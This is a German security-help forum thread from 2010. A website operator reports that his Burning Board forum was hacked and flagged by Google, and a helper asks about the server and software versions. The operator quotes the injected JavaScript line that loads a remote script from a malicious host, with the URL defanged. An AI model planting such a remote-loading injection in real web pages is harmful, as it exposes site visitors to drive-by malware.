Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: JavaScript Hack auf Website - diretctrishta

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 17.10.2010, 10:26   #1
nzerox
 
JavaScript Hack auf Website - diretctrishta - Standard

JavaScript Hack auf Website - diretctrishta



Hiho

hoffe ich kann mein Problem hier posten da es sich ja nicht um einen Trojaner im eigentlichen Sinne handelt sondern, wie schon im Betreff geschrieben, um einen Hack meiner Homepage bzw. des Forums.

Ich habe seit einigen Tagen gemerkt, dass beim Forum aufruf eine mir unbekannte Seite aufgerufen werden wollte.
Dadurch kam es auch Zeitweise zu sehr langen Ladezeiten des Forums.
Ich habe mir aber nichts weiter dabei gedacht weiil ich auch bei Google nichts Hilfreiches finden konnte, ausser das das irgendein JavaScrpt unpacker sein soll.

Mitlerweile gibt es einen Eintrag wo jemand von einem Hack spricht und demnach bin ich nun auch darauf gekommen, dass es ein Hack sein muss.
Gerade weil auch seit heute die Seite von Google gesperrt wurde:
"Als attackierend gemeldete Webseite!

Die Webseite auf w*w.erkelenzer06.de/board/ wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert

Attackierende Webseiten versuchen, Programme zu installieren, die private Informationen stehlen, Ihren Computer verwenden, um andere zu attackieren oder Ihr System beschädigen.

Manche Webseiten vertreiben bewusst Viren und ähnlich schädliche Software, aber viele Webseiten sind auch ohne das Wissen oder die Erlaubnis des Betreibers kompromittiert."

Ich habe auch schon gerausgefunden, dass nun in jeder JavaScript Datei folgender String angefügt wurde:
Code:
ATTFilter
document.write('<sc'+'ript type="text/javascript" src="hxxp://addle.diretctrishta.com:8080/Binary.js"></scri'+'pt>');
         
Daraufhin habe ich aus jeder JS Datei diesen String raus gelöscht nur besteht das Problem weiterhin.
Hat jemand eine Ahnung woher dieser Kram kommt und wie man diesen entfernen kann?

Daten:
URL - h**p://www.erkelenzer06.de/board
Forum - Woltlab Burning Board 3.1.2

Alt 18.10.2010, 10:51   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
JavaScript Hack auf Website - diretctrishta - Standard

JavaScript Hack auf Website - diretctrishta



Zitat:
Hat jemand eine Ahnung woher dieser Kram kommt und wie man diesen entfernen kann?
Um sicher zu gehen, musst Du wahrscheinlich die Seite neu aufsetzen.
Erzähl mal was über den Server. Wie siehts aus mit

- Betriebssystem und Patchlevel
- Webserver, welche Version
- PHP? MySQL?
- Forumsoftware auf dem aktuellsten Stand? Alte Boardsoftware mit Sicherheitslücken wird schnell angegriffen...
- wie genau hast Du die Seite bzw. den Server im Griff?
__________________

__________________

Antwort

Themen zu JavaScript Hack auf Website - diretctrishta
attackierende, aufruf, bewusst, blockiert, burningboard, code, computer, datei, entfernen, folge, gelöscht, gesperrt, google, google gesperrt, hack, homepage, javascript, malware, nichts, problem, programme, seite, sicherheitseinstellungen, software, system, trojaner, viren, webseite, webseiten



Ähnliche Themen: JavaScript Hack auf Website - diretctrishta


  1. Opera - JavaScript: Sperrung
    Plagegeister aller Art und deren Bekämpfung - 11.07.2015 (9)
  2. In meiner eigenen Website sind 2 Einzelseiten mit Javascript, die nicht starten.
    Alles rund um Mac OSX & Linux - 10.03.2014 (13)
  3. Windows 7: Avast meldet bei JEDER Website "schädliche Website blockiert"!
    Plagegeister aller Art und deren Bekämpfung - 02.02.2014 (20)
  4. evtl. PC-Hack oder Online-Hack?
    Log-Analyse und Auswertung - 19.01.2014 (1)
  5. Hack über Website?
    Plagegeister aller Art und deren Bekämpfung - 06.11.2013 (5)
  6. Chrome Javascript blocker
    Antiviren-, Firewall- und andere Schutzprogramme - 10.09.2013 (1)
  7. Website-Infizierung/-Hack -> Einfügen eines iframes...
    Plagegeister aller Art und deren Bekämpfung - 17.05.2011 (3)
  8. Was ist das genau? Javascript in einer Website, öffnet Acrobat Reader
    Plagegeister aller Art und deren Bekämpfung - 16.10.2009 (10)
  9. JavaScript - Frage!!!
    Alles rund um Windows - 08.08.2009 (5)
  10. JavaScript Infektion
    Plagegeister aller Art und deren Bekämpfung - 11.10.2007 (4)
  11. Javascript Injection
    Plagegeister aller Art und deren Bekämpfung - 31.08.2007 (4)
  12. JavaScript - gut oder böse?
    Diskussionsforum - 15.09.2006 (3)
  13. javascript sexmaxx.com
    Log-Analyse und Auswertung - 29.10.2005 (18)
  14. JavaScript-Problem im TB
    Lob, Kritik und Wünsche - 02.05.2005 (6)
  15. [Suche] JavaScript
    Alles rund um Windows - 19.01.2004 (4)
  16. javascript
    Alles rund um Windows - 01.04.2003 (1)
  17. Board und JavaScript
    Plagegeister aller Art und deren Bekämpfung - 18.03.2003 (2)

Zum Thema JavaScript Hack auf Website - diretctrishta - Hiho hoffe ich kann mein Problem hier posten da es sich ja nicht um einen Trojaner im eigentlichen Sinne handelt sondern, wie schon im Betreff geschrieben, um einen Hack meiner - JavaScript Hack auf Website - diretctrishta...
Archiv
Du betrachtest: JavaScript Hack auf Website - diretctrishta auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.